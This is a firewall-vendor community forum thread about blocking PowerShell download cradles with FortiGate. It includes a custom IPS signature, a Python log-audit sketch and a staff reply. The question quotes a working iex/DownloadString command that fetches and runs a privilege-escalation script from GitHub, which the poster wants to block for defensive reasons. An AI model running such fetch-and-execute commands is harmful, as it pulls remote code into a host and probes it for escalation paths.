AUT_Maverick
New Contributor

fortigate block powershell

Hello Guys,

I have a simple question: how can I block Windows PowerShell commands like this:

I created a firewall policy where the source is my test client, moved the policy before rule #1, activated DPI + Application Control, and selected Windows.Powershell with action Block in the Application Control profile. What did I do wrong? When I visit the website "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1" manually with the browser, I see that I have the FortiGate SSL cert instead of the GitHub one.

Also in FortiAnalyzer the log tells me that traffic to raw.githubusercontent.com goes via my newly created policy. Under Application in the log there is only the application HTTP.BROWSER but not Powershell.

iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1');Invoke-PrivescCheck -Extended -Report PrivescCheck -Format TXT,HTML

 

Edit 1: I found a workaround for the ps1 file. I created a custom IPS signature which scans the URI for .ps1, like this:

F-SBID( --revision 1; --attack_id 8614; --name "BlockPS1"; --service HTTP; --protocol tcp; --pattern ".ps1"; --context uri; --no_case; --flow from_client;)
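
Added example, not part of the original post: a Python sketch that models the signature above as a case-insensitive substring match on the URI (an assumption about its semantics) and audits log lines to show which requests it hits, which of those are real .ps1 paths, and whether they were blocked. The log lines and their field names (url, action, and so on) are constructed for illustration.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import urlsplit

# Constructed sample log lines; the key=value field names are assumptions.
SAMPLE_LOGS = [
    'srcip=10.0.0.15 hostname="raw.githubusercontent.com" '
    'url="/itm4n/PrivescCheck/master/PrivescCheck.ps1" app="HTTP.BROWSER" action="pass"',
    'srcip=10.0.0.15 hostname="files.example.test" url="/tools/Setup.PS1" action="block"',
    'srcip=10.0.0.22 hostname="docs.example.test" url="/ps/Types.ps1xml" action="block"',
    'srcip=10.0.0.22 hostname="search.example.test" url="/find?q=open+.ps1+file" action="block"',
    'srcip=10.0.0.30 hostname="www.example.test" url="/index.html" action="pass"',
]

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_kv(line):
    """Parse key=value and key="quoted value" pairs into a dict."""
    return {k: (q if q else bare) for k, q, bare in KV.findall(line)}

def signature_hits(uri):
    """Model of --pattern ".ps1"; --context uri; --no_case (assumed: plain substring)."""
    return ".ps1" in uri.lower()

def is_ps1_path(uri):
    """Stricter check: the URI path itself ends in the .ps1 extension."""
    return PurePosixPath(urlsplit(uri).path).suffix.lower() == ".ps1"

def audit(lines):
    """Classify each log line against the signature model."""
    report = {"script_passed": [], "script_blocked": [], "other_match": []}
    for rec in map(parse_kv, lines):
        uri = rec.get("url", "")
        if not signature_hits(uri):
            continue
        if not is_ps1_path(uri):
            report["other_match"].append(uri)      # candidate false positive
        elif rec.get("action") == "block":
            report["script_blocked"].append(uri)
        else:
            report["script_passed"].append(uri)    # signature not enforced here
    return report

if __name__ == "__main__":
    for bucket, uris in audit(SAMPLE_LOGS).items():
        print(bucket, uris)
```

Entries under script_passed point at policies or sessions where the signature is not being applied; entries under other_match are matches on something other than a .ps1 file path and are worth reviewing before enforcing the block broadly.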

abarushka
Staff

Hello,

 

I suspect that you get the FortiGate deep inspection default certificate because the traffic was blocked by FortiGate and the replacement message was generated using the FortiGate deep inspection default certificate.
